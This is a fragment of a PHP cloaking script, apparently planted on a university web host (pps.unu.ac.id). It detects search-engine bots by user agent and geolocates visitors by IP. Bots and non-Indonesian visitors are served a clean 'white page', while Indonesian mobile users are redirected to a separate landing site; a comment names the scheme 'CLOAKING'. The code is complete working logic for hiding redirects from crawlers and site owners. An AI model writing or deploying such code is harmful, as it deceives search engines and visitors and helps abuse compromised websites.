Verifikasi Google Search Console aktif. '; ob_end_flush(); exit(); } // Cek apakah bot $isBot = false; foreach ($botKeywords as $bot) { if (stripos($userAgent, $bot) !== false) { $isBot = true; break; } } // Ambil lokasi dari IP function get_ip_country($ip) { $url = "http://ip-api.com/json/$ip"; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 2); $res = curl_exec($ch); curl_close($ch); if ($res) { $geo = json_decode($res, true); return $geo['country'] ?? null; } return null; } $country = get_ip_country($ip) ?: 'UNKNOWN'; $isMobile = $detect->isMobile(); // CLOAKING: Jika bot atau bukan dari Indonesia → tampilkan white page if ($isBot || $country !== 'Indonesia') { echo @file_get_contents('https://pps.unu.ac.id/white.php') ?: 'Gagal load white.php'; ob_end_flush(); exit(); } // Jika dari Indonesia dan pakai HP → redirect ke landing if ($isMobile && $country === 'Indonesia') { header("Location: https://berita-terkini.id/pps/"); exit(); } // Selain itu, tampilkan white juga echo @file_get_contents('https://pps.unu.ac.id/white.php') ?: 'Gagal load white.php'; ob_end_flush(); ?>